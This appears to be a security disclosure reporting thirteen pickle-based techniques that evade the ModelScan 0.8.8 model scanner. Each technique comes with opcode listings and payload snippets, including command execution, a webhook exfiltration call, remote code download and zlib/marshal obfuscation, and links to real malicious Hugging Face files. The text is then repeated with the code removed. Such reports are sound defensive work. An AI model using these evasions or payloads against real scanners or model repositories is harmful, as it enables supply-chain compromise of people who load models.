ModelScan: Multiple False Negative Issues
Tested version: ModelScan 0.8.8
Summary
During a systematic evaluation of malicious model files on Hugging Face, I identified numerous categories of pickle-based evasion techniques that ModelScan fails to detect. Each section below includes a description of the technique and a reference to an actual malicious model file on Hugging Face.
1. Alternative Execution Primitives
Malicious pickle files can invoke command execution or exfiltration through functions not present in ModelScan's denylist.
Command execution via torch.utils.collect_env.run:
from torch.library import torch.utils.collect_env.run
_var0 = torch.utils.collect_env.run('rm pwnd.txt')
Command execution via multiprocessing.util.spawnv_passfds:
from multiprocessing.util import spawnv_passfds
_var0 = spawnv_passfds(b'/bin/sh', ('/bin/sh', '-c', 'echo bypass'), ())
Command execution via mlflow.projects.backend.local._run_entry_point:
from mlflow.projects.backend.local import _run_entry_point
_var0 = _run_entry_point('echo "You\'ve been pwned."', '.', '', '')
Data exfiltration via pandas.io.parsers.readers.read_csv:
from pandas.io.parsers.readers import read_csv
_var0 = read_csv('https://webhook.site/...?pwned=pandas_bypass')
Code download via urllib.request.urlretrieve:
from urllib.request import urlretrieve
_var0 = urlretrieve('https://github.com/hauson-fan/hauson-fan.github.io/raw/master/files/torch.pyc', './torch.pyc')
Command execution via numpy.testing._private.utils.runstring:
from numpy.testing._private.utils import runstring
_var0 = runstring("import os; os.system('curl https://na1wm7wp10256hviaadj41undej57xvm.x9.to')", {})
| Sample |
HF Model ID |
Filename |
torch.utils.collect_env.run |
ias-d-kt/ias-1 |
indirect_import.pkl |
spawnv_passfds |
aakashjapi/tmp |
poc_spawnv_passfds.pkl |
_run_entry_point |
agentops/text-generation |
pytorch_model.bin |
read_csv |
Tanaka53814545/pickle-model-test |
pytorch_model.bin |
urlretrieve |
hauson-fan/RagReuse |
psgs_w100.tsv.pkl |
runstring |
heckintosh/TestPickle |
payload.pt |
2. Nested Deserialization
The malicious payload is embedded inside the argument of a deserialization function call. ModelScan inspects only pickle-level globals and does not recursively parse the nested payload.
YAML variant
yaml.load with UnsafeLoader deserializes a YAML string containing !!python/object/apply:os.system.
from yaml import load
from yaml.loader import UnsafeLoader
_var0 = load('\n!!python/object/apply:os.system ["id"]\n', UnsafeLoader)
Pickle variant
torch.storage._load_from_bytes internally calls torch.load(io.BytesIO(b), weights_only=False). The argument contains a second pickle payload with builtins.exec.
from torch.storage import _load_from_bytes
_var0 = _load_from_bytes(b"\x80\x04cbuiltins\nexec\n(\x8c\x19import os;os.system('ls')tR...")
| Sample |
HF Model ID |
Filename |
| YAML nested |
apsighruaepoirhg/cucumber |
cucumber-s17.pkl |
| Pickle nested |
jjhhjjhhjjhhjjhh/test-model |
file3_.pkl |
3. zipfile Exception
PyTorch's custom Zip extractor differs from the standard Python zipfile module used by static scanners. A crafted model can exploit this gap to crash the scanner via a BadZipFile exception while PyTorch loads it normally. Prior research by Liu et al. (arXiv:2508.19774) describes this technique.
| Sample |
HF Model ID |
Filename |
| zipfile crash |
HFscanner1231/malware_opcode_frequencies |
does_not_scan_but_opens_in_torch.pth |
4. pickletools Exception
Appending a truncated opcode (e.g., BINUNICODE without its required length prefix) after the malicious payload causes a ValueError in pickletools.genops. The pickle module executes opcodes sequentially, so the payload runs at REDUCE before the corrupted tail is reached.
0: 80 PROTO 2
2: 63 GLOBAL 'builtins exec'
17: 28 MARK
18: 58 BINUNICODE "\nf = open('my_file.txt', 'a'); f.write('Malicious'); f.close()"
85: 74 TUPLE
86: 52 REDUCE
87: 58 ??? ← truncated opcode crashes pickletools
This technique was first reported by ReversingLabs as an evasion against PickleScan, which has since been patched.
| Sample |
HF Model ID |
Filename |
| pickletools crash |
kemalik/42-eicar |
model_broken_X.pkl |
5. Scanner-Specific Exceptions
These samples do not corrupt the opcode stream itself. Instead, they append deliberately malformed operands after the malicious GLOBAL + REDUCE payload, triggering unhandled exceptions in ModelScan's own parsing logic. The payload executes at REDUCE before the malformed tail is ever reached by the pickle runtime.
5a. Invalid Memo Reference
BINGET references a memo key that was never stored. ModelScan raises KeyError when resolving memo references internally.
0: 80 PROTO 4
2: 63 GLOBAL 'os system'
13: 56 UNICODE 'touch /tmp/pwned-by-keyerror'
43: 85 TUPLE1
44: 52 REDUCE
45: 30 POP
46: 8c SHORT_BINUNICODE 'os'
50: 94 MEMOIZE # memo[0] = 'os'
51: 68 BINGET 3 # memo[3] does not exist → KeyError
| Sample |
HF Model ID |
Filename |
| Invalid memo ref |
anky89/global1 |
key_error.pkl |
5b. Type-Confused Stack Operands
Pushing a non-string type onto the stack as a STACK_GLOBAL operand causes TypeError in ModelScan's string operations.
bytes variant:
48: 43 SHORT_BINBYTES b'os' # bytes, not str
...
72: 93 STACK_GLOBAL # (b'os', 'system') → TypeError
int variant:
50: 4a BININT 42 # int, not str
...
65: 93 STACK_GLOBAL # (42, 'os') → TypeError
| Sample |
HF Model ID |
Filename |
| Type confusion (bytes) |
anky89/global1 |
bytes_conf.pkl |
| Type confusion (int) |
anky89/globals |
stack-glb.pkl |
5c. Unhashable Type on Stack
BYTEARRAY8 pushes a mutable bytearray onto the stack. ModelScan raises TypeError: unhashable type: 'bytearray' when collecting globals into a set.
54: 96 BYTEARRAY8 bytearray(b'system')
...
85: 93 STACK_GLOBAL # ('os', bytearray(b'system')) → TypeError
| Sample |
HF Model ID |
Filename |
| Unhashable bytearray |
anky89/global1 |
unhash_byte.pkl |
6. Obfuscation
Malicious pickle files that compress the payload with zlib are not detected. The zlib.decompress call itself is not on the denylist, and the compressed blob hides the actual malicious code (e.g., os.system, subprocess) from pattern matching.
from zlib import decompress
_var0 = decompress(b'x\xda\xbdWmk\xe3F\x10\xfe...(truncated)')
_var1 = exec(_var0)
| Sample |
HF Model ID |
Filename |
| zlib obfuscation |
coldwaterq/sectest |
coldwaterq_inject_calc.pt |
7. Pickle's Python 2 Compatibility Mapping
When pickle protocol < 3 and fix_imports=True, the pickle module uses _compat_pickle.IMPORT_MAPPING to remap module names. Specifying commands instead of subprocess in the GLOBAL opcode bypasses the denylist, but at runtime commands is mapped to subprocess.
from commands import run
_var0 = run(['echo "Malicious PyTorch model executed!"'])
Reference: CPython _compat_pickle.py
| Sample |
HF Model ID |
Filename |
| Python 2 compat mapping |
dltest12345/testmodel |
small_malicious.pt |
8. CodeType/FunctionType Construction
Malicious bytecode is embedded in a CodeType object, wrapped into a callable via FunctionType, and immediately invoked. The malicious logic is in raw bytecode, avoiding commonly flagged patterns.
Basic form
Both types are imported directly from the types module.
from types import FunctionType
from types import CodeType
_var0 = CodeType(0, 0, 0, 1, 3, 67, b'd\x01d\x00l\x00}\x00|...', (None, 0, 'echo pwned > pwned.txt'), ('os', 'system'), ('os',), '...', 'payload_func', 11, b'\x08\x01\x0e\x01', (), ())
_var1 = FunctionType(_var0, {})
Indirect variant
CodeType/FunctionType are obtained via runtime introspection on an arbitrary function, avoiding direct imports.
from copy import copy
_var0 = type(copy) # FunctionType
from operator import methodcaller
_var1 = methodcaller('__getattribute__', '__code__')
from copy import copy
_var2 = _var1(copy) # copy.__code__
_var3 = type(_var2) # CodeType
_var4 = _var3(0, 0, 0, 1, 3, 67, b'd\x01d\x00l\x00}\x00|...', ...)
_var5 = _var0(_var4, {})
Marshal variant
marshal.loads deserializes a pre-built code object from raw bytes, making the bytecode opaque to scanners.
from types import FunctionType
from marshal import loads
_var0 = loads(b'\xe3\x00...')
_var1 = FunctionType(_var0, {})
_var2 = _var1()
| Sample |
HF Model ID |
Filename |
| CodeType basic |
hu4i/bypass |
stealthy_exploit1.pt |
| CodeType indirect |
hu4i/bypass |
stealthy_exploit2.pt |
| Marshal variant |
hu4i/bypass |
stealthy_exploit.pt |
9. Uncommon Opcodes
9a. EXT2 Opcode with copyreg.add_extension
The payload registers a dangerous function in the pickle extension registry via copyreg.add_extension, then invokes it via EXT2. The actual dangerous callable never appears in a GLOBAL or STACK_GLOBAL opcode.
2: GLOBAL 'copyreg add_extension'
25: BINUNICODE 'multiprocessing.util'
50: BINUNICODE 'spawnv_passfds'
69: BININT2 31337
73: REDUCE # registers spawnv_passfds as ext code 31337
75: EXT2 31337 # resolves to spawnv_passfds
...
221: REDUCE # executes the shell command
9b. INST Opcode with Memo Indirection
The INST opcode (old protocol 0) dynamically constructs the target module name and passes it to STACK_GLOBAL through the memo.
0: PROTO 4
2: MARK
3: SHORT_BINUNICODE 'os'
7: INST 'builtins str' # builtins.str('os') → 'os'
21: BINPUT 0 # stores 'os' in memo[0]
23: BINGET 0
25: SHORT_BINUNICODE 'system'
33: STACK_GLOBAL # resolves os.system via memo
34: SHORT_BINUNICODE 'echo "You\'ve been pwned".'
61: TUPLE1
62: REDUCE
| Sample |
HF Model ID |
Filename |
| EXT2 + copyreg |
aakashjapi/tmp |
poc_spawnv_ext_autoreg.pkl |
| INST + memo |
mldebugger/circuit-tracer |
pytorch_model.bin |
10. Python Introspection Chain
The payload uses only builtins in GLOBAL opcodes, chaining from safe builtins (print) through object.__subclasses__() to reach eval via __init__.__builtins__.
11: GLOBAL 'builtins __setattr__'
34: GLOBAL 'builtins print.__class__.__base__.__subclasses__'
84: EMPTY_TUPLE
85: REDUCE # object.__subclasses__()
... # inject into builtins namespace via __setattr__
130: GLOBAL 'builtins subclasses.__getitem__'
138: BININT1 137
141: REDUCE # subclasses[137] → gadget class
...
157: GLOBAL 'builtins gadget.__init__.__builtins__.__getitem__'
208: SHORT_BINUNICODE 'eval'
215: REDUCE # __builtins__['eval']
219: SHORT_BINUNICODE '__import__("os").system("touch /tmp/oicu")'
264: REDUCE # eval(...)
Every GLOBAL opcode references only builtins, which scanners typically allowlist.
| Sample |
HF Model ID |
Filename |
| Introspection chain |
oicu/test |
output.pkl |
11. Indirect Model Loading
A pickle file loads another malicious model from the Hugging Face Hub during deserialization.
from transformers.models.auto.auto_factory import getattribute_from_module
from transformers.models.auto.tokenization_auto import AutoTokenizer
_var0 = getattribute_from_module(AutoTokenizer, 'from_pretrained')
_var1 = _var0('zpbrent/reuse')
This technique was originally introduced by JFrog.
| Sample |
HF Model ID |
Filename |
| Indirect model loading |
protectai-bot/transfo-xl |
vocab.pkl |
12. File Extension and Format Mismatch
A raw pickle file with a PyTorch-associated extension (.bin, .pt, .pth, .ckpt) exploits ModelScan's extension-based scanner routing. PyTorchUnsafeOpScan expects a ZIP archive with the PyTorch magic number. Since a raw pickle file lacks this magic number, ModelScan skips the file without falling back to the plain pickle scanner. torch.load() accepts both formats, so the payload executes normally.
| Sample |
HF Model ID |
Filename |
| Extension mismatch |
astnulrn/llama-1b |
pytorch_model.bin |
13. Old Format (TAR Archive)
PyTorch originally used the TAR archive format before switching to ZIP-based archives in v1.6. torch.load() transparently handles both formats. ModelScan's source code explicitly acknowledges this gap:
# try loading from tar
try:
# TODO: implement loading from tar
raise TarError()
| Sample |
HF Model ID |
Filename |
| TAR format |
aisecre/HS |
tar2pkl.pt |
ModelScan: Multiple False Negative Issues
Tested version: ModelScan 0.8.8
Summary
During a systematic evaluation of malicious model files on Hugging Face, I identified numerous categories of pickle-based evasion techniques that ModelScan fails to detect. Each section below includes a description of the technique and a reference to an actual malicious model file on Hugging Face.
1. Alternative Execution Primitives
Malicious pickle files can invoke command execution or exfiltration through functions not present in ModelScan's denylist.
Command execution via
torch.utils.collect_env.run:Command execution via
multiprocessing.util.spawnv_passfds:Command execution via
mlflow.projects.backend.local._run_entry_point:Data exfiltration via
pandas.io.parsers.readers.read_csv:Code download via
urllib.request.urlretrieve:Command execution via
numpy.testing._private.utils.runstring:torch.utils.collect_env.runspawnv_passfds_run_entry_pointread_csvurlretrieverunstring2. Nested Deserialization
The malicious payload is embedded inside the argument of a deserialization function call. ModelScan inspects only pickle-level globals and does not recursively parse the nested payload.
YAML variant
yaml.loadwithUnsafeLoaderdeserializes a YAML string containing!!python/object/apply:os.system.Pickle variant
torch.storage._load_from_bytesinternally callstorch.load(io.BytesIO(b), weights_only=False). The argument contains a second pickle payload withbuiltins.exec.3.
zipfileExceptionPyTorch's custom Zip extractor differs from the standard Python
zipfilemodule used by static scanners. A crafted model can exploit this gap to crash the scanner via aBadZipFileexception while PyTorch loads it normally. Prior research by Liu et al. (arXiv:2508.19774) describes this technique.4.
pickletoolsExceptionAppending a truncated opcode (e.g.,
BINUNICODEwithout its required length prefix) after the malicious payload causes aValueErrorinpickletools.genops. Thepicklemodule executes opcodes sequentially, so the payload runs atREDUCEbefore the corrupted tail is reached.This technique was first reported by ReversingLabs as an evasion against PickleScan, which has since been patched.
5. Scanner-Specific Exceptions
These samples do not corrupt the opcode stream itself. Instead, they append deliberately malformed operands after the malicious
GLOBAL+REDUCEpayload, triggering unhandled exceptions in ModelScan's own parsing logic. The payload executes atREDUCEbefore the malformed tail is ever reached by the pickle runtime.5a. Invalid Memo Reference
BINGETreferences a memo key that was never stored. ModelScan raisesKeyErrorwhen resolving memo references internally.5b. Type-Confused Stack Operands
Pushing a non-string type onto the stack as a
STACK_GLOBALoperand causesTypeErrorin ModelScan's string operations.bytes variant:
int variant:
5c. Unhashable Type on Stack
BYTEARRAY8pushes a mutablebytearrayonto the stack. ModelScan raisesTypeError: unhashable type: 'bytearray'when collecting globals into a set.6. Obfuscation
Malicious pickle files that compress the payload with
zlibare not detected. Thezlib.decompresscall itself is not on the denylist, and the compressed blob hides the actual malicious code (e.g.,os.system,subprocess) from pattern matching.7. Pickle's Python 2 Compatibility Mapping
When pickle protocol < 3 and
fix_imports=True, the pickle module uses_compat_pickle.IMPORT_MAPPINGto remap module names. Specifyingcommandsinstead ofsubprocessin theGLOBALopcode bypasses the denylist, but at runtimecommandsis mapped tosubprocess.Reference: CPython _compat_pickle.py
8. CodeType/FunctionType Construction
Malicious bytecode is embedded in a
CodeTypeobject, wrapped into a callable viaFunctionType, and immediately invoked. The malicious logic is in raw bytecode, avoiding commonly flagged patterns.Basic form
Both types are imported directly from the
typesmodule.Indirect variant
CodeType/FunctionTypeare obtained via runtime introspection on an arbitrary function, avoiding direct imports.Marshal variant
marshal.loadsdeserializes a pre-built code object from raw bytes, making the bytecode opaque to scanners.9. Uncommon Opcodes
9a.
EXT2Opcode withcopyreg.add_extensionThe payload registers a dangerous function in the pickle extension registry via
copyreg.add_extension, then invokes it viaEXT2. The actual dangerous callable never appears in aGLOBALorSTACK_GLOBALopcode.9b.
INSTOpcode with Memo IndirectionThe
INSTopcode (old protocol 0) dynamically constructs the target module name and passes it toSTACK_GLOBALthrough the memo.10. Python Introspection Chain
The payload uses only
builtinsinGLOBALopcodes, chaining from safe builtins (print) throughobject.__subclasses__()to reachevalvia__init__.__builtins__.Every
GLOBALopcode references onlybuiltins, which scanners typically allowlist.11. Indirect Model Loading
A pickle file loads another malicious model from the Hugging Face Hub during deserialization.
This technique was originally introduced by JFrog.
12. File Extension and Format Mismatch
A raw pickle file with a PyTorch-associated extension (
.bin,.pt,.pth,.ckpt) exploits ModelScan's extension-based scanner routing.PyTorchUnsafeOpScanexpects a ZIP archive with the PyTorch magic number. Since a raw pickle file lacks this magic number, ModelScan skips the file without falling back to the plain pickle scanner.torch.load()accepts both formats, so the payload executes normally.13. Old Format (TAR Archive)
PyTorch originally used the TAR archive format before switching to ZIP-based archives in v1.6.
torch.load()transparently handles both formats. ModelScan's source code explicitly acknowledges this gap: